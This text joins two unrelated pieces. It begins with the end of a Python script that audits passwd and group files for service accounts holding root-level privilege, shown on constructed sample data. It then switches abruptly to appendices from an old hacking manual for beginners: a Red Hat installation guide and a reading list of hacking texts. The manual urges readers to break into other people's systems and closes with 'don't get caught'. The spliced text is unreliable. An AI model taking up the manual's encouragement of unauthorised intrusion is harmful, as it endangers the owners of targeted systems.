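misconfiguration (a web daemon account given UID 0) for the audit to catch.
"""
from typing import Dict, List, NamedTuple, Set


class Account(NamedTuple):
    name: str
    uid: int
    gid: int            # primary group
    shell: str


class Group(NamedTuple):
    name: str
    gid: int
    members: Set[str]   # supplementary members listed in /etc/group


def parse_passwd(text: str) -> Dict[str, Account]:
    """name:pw:uid:gid:gecos:home:shell -> {name: Account}; blank/comment lines skipped."""
    accounts = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, uid, gid, _gecos, _home, shell = line.split(":")
        accounts[name] = Account(name, int(uid), int(gid), shell)
    return accounts


def parse_group(text: str) -> Dict[str, Group]:
    """name:pw:gid:member,member -> {name: Group}."""
    groups = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":")
        groups[name] = Group(name, int(gid), {m for m in members.split(",") if m})
    return groups


def effective_members(group: str, accounts: Dict[str, Account],
                      groups: Dict[str, Group]) -> Set[str]:
    """Everyone in a group: listed members plus accounts whose primary GID is that group."""
    g = groups[group]
    primary = {a.name for a in accounts.values() if a.gid == g.gid}
    return g.members | primary


# Groups whose membership is effectively root-equivalent on a classic UNIX box:
# root (GID 0), wheel (su access) and disk (raw access to block devices).
PRIVILEGED_GROUPS = ("root", "wheel", "disk")


def audit_daemon_accounts(passwd_text: str, group_text: str) -> Dict[str, List[str]]:
    """Findings per service account (non-login shell) that holds root-level privilege."""
    accounts, groups = parse_passwd(passwd_text), parse_group(group_text)
    findings: Dict[str, List[str]] = {}
    for acct in accounts.values():
        if acct.shell not in ("/sbin/nologin", "/bin/false"):
            continue        # interactive users are out of scope for this check
        problems = []
        if acct.uid == 0:
            problems.append("UID 0: a remote exploit of this daemon yields a root shell")
        for grp in PRIVILEGED_GROUPS:
            if grp in groups and acct.name in effective_members(grp, accounts, groups):
                problems.append(f"member of privileged group '{grp}'")
        if problems:
            findings[acct.name] = problems
    return findings


# Constructed sample files (not copied from any real system).
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
httpd:x:0:0:web daemon:/var/www:/sbin/nologin
alice:x:500:100::/home/alice:/bin/bash
"""

GROUP = """\
root:x:0:root
bin:x:1:root,bin,daemon
daemon:x:2:root,bin,daemon
sys:x:3:root,bin,adm
adm:x:4:root,adm,daemon
disk:x:6:root
lp:x:7:daemon,lp
wheel:x:10:root,alice
users:x:100:
"""

if __name__ == "__main__":
    for name, problems in audit_daemon_accounts(PASSWD, GROUP).items():
        print(name, "->", "; ".join(problems))
```

The bin, daemon, adm and lp accounts pass because their groups (bin, daemon, sys, adm, lp) carry no root-equivalent rights; httpd is flagged twice, once for UID 0 itself and once because a primary GID of 0 makes it a member of the root group without appearing anywhere in /etc/group, which is the case a by-eye review of the group file misses.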
Appendix G - Redhat Linux Installation
Many kool hacker things for UNIX require that you are root. So you need root on a
system, but can't hack root cuz you can't use Nmap, SATAN, or even showmount. Also
there's no better way to learn how to hack UNIX machines than practicing on your own.
You need to install Linux on a partition of your hard drive. Some newbies have trouble
with this - it's not exactly like a Windows installation.
Redhat is probably the easiest Linux to get up and running, rivaled by Caldera and SuSE.
Version 6.X is out, but 5.2 will cost you only $30. Or have a friend burn you a copy of
the CD-ROMs and boot floppy. Once you have this, you're ready to begin.
First write down everything about your PC you can, especially monitor and display
adapter info.
If your machine can't natively boot off of your CD-ROM drive, Redhat comes with a boot
floppy. Slap it in, and boot up. When prompted, hit enter for normal (versus expert)
mode. Drivers for your CD-ROM, keyboard, and monitor will be loaded, and installation
will be switched over to your CD-ROM (make sure the CD is in). You'll then be asked
where you want to install from (NFS, Image, etc). Choose CD-ROM obviously.
When you partition your hard drive, use Disk Druid. You'll need a separate partition for
Linux swap space - make it 7 MB or so. HDA1 is hard drive 1 (a), partition 1, whereas
HDB3 is hard drive 2 (b) partition 3. Disk Druid uses this naming scheme. This is also
how partitions will be referred to later during the installation, and in your /etc file (HDA1
is represented by the file /etc/hda1).
Soon you'll be prompted with a class of install: Workstation, Server, and Custom. If you
have the hard drive space (a little over a gig) choose server, otherwise choose workstation
(500 MB). If you have any less than 500 megs, you won't be able to install enough to
make a k-leet Linux box. Anyways, Custom allows you to pick individual packages - if
you do this, make sure you include C development libraries (to compile exploits), editors,
and X (if you want a GUI).
X (X Windows, the GUI for Linux) is probably the hardest part to install. If your display
card isn't in the list presented to you, you'll have to find out the following settings
for your machine: vertical refresh rate, horizontal sync rate, megs of video RAM, and your
clockchip setting. Get these from documentation that came with your hardware, or from
technical support. If you just can't figure it out, try different settings until it works.
Xconfigurator is the utility to change X settings after installation.
LILO is the program you use to change boot parameters. If you have multiple OSs
(Win98, NT, and Linux), you'll need to configure LILO to boot to all these OSs. The
installation will prompt you for the necessary info, otherwise use linuxconfig to do it
manually.
Use the linuxconfig utility to configure your box after installation. Use netconf to config
networking (including dial-up networking) stuph for your box. The redhat website
(www.redhat.com) also is a good source for tech support. www.freshmeat.com has a
good dialer program to get you connected to the net, and www.slashdot.com is always a
good Linux reference.
Appendix H - Further Reading
This manual is the most in-depth yet all-encompasing hacking text for newbies I've seen
yet. Im not bragging - I too have lot to learn. But Ive put a lot of time into this text
over the various releases, and I think it covers a lot. The Net does hold a lot more,
though. Some you'll find are very basic and a bit of a waste of time. Others are very old,
and only cover stuph like dial-up hacking. Lame. There are a lot of good texts out there
that cover very specific areas of hacking (details that couldn't be covered here without
writing an encyclopedia). I encourage you to download and read as many of these as you
can get your hands on. Target a SCO Unixware box? Get a text on SCO vulnerabilities.
Find a new, more complex hacking tool such as NMap or NetCat? Grab a tutorial on it theres no need for me to reinvent the wheel. Also, a few books have been published on
the subject. Here's a quick guide to texts and books worth your time.
Texts
The Happy Hacker's Guides to Mostly Harmless Hacking are worth reading, especially for
newbies. Get them at www.happyhacker.org.
The Hacker's Desk Reference is a in-depth look at Windows Networking and NetBEUI,
along with other things. This is a very informative text, but might confuse the newbies.
By Rhino9. Available at TCU.
The NT WarDoc is a new text also by Rhino9. It covers NT break-in techniques in more
detail. Also available at TCU.
Securing Your Site by Breaking Into It is a good all-around UNIX hacking text. Available
at TCU.

The Hacker's Kit is handy. It's a bit old, but if you can wade through the occasional lame
content, you'll find useful UNIX hacking tricks. This text is also filled with C code - tools
and exploits of all kinds. Available at TCU.
Books
If you've ever heard of the Rainbow Books, they're worth a look. They're specific
books on specific technologies and entities. Old, but useful.
For general Network books, take a look at these: Networking Essentials by Microsoft
Press. This is a beginner's book to how networks work.
Cisco Routers and TCP/IP - complex, but great for learning how the Internet really
works.
The Big UNIX Book is just that - full of UNIX info, including shell scripting,
configuration, etc. Secrets of Redhat Linux is also good. Microsoft TCP/IP and NT
Technical Support are good books to learn the inner workings of NT.
And then the actual hacker books.
Secrets of a Super Hacker by The Knightmare was the first of these. It's pretty vague, and
doesn't cover Internet hacking (due to its age), but is worth at least a check-out from your
library.
The Happy Hacker is a great book for complete newbies. But if you consider yourself a
novice hacker, most of the stuph in that book will bore you.
Maximum Security is a huge book with good info and a pretty big list of system
vulnerabilities. It explains how to secure a network by explaining to how hack into one
(sort of). It also has a decent amount of TCP/IP info - stuph you'll need to know. It
covers NT and UNIX well too.
Maximum Linux Security is pretty good too. It covers Linux security as well as other
miscellaneous Linux issues. One particularly nice thing about this book is that it explains how
to set up a firewall with Linux.
And Hacking Exposed - the latest one. This one is, in my opinion, the best of the four.
Not for amateurs, but definitely a good book. You'll learn all sorts of leet techniques to
use, along with what programs to use and how to use them. Get this book.
RFCs are good references to technical material as well. www.hackersclub.com gets lots
of submissions on specific vulnerabilities - always a good place to look. The further
reading section is titled how to become elite for a reason. In order to become 31337,
you'll have to do a lot of reading. Not just how to hack stuph either. You'll need to
learn all kinds of systems, protocols, and technologies. Another great way to learn about a
certain system is to install it on your own machine. Get NT Server and install IIS. Most
Linux distributions come with the Apache Web Server - install it and see how it works for
yourself. You'll be much better armed in hacking it.
Mostly, just have fun with this stuff. Enjoy learning what you must in order to break in.
The process, not just the end result. So, on that note, have fun, learn, and don't get
caught.
Happy Hacking!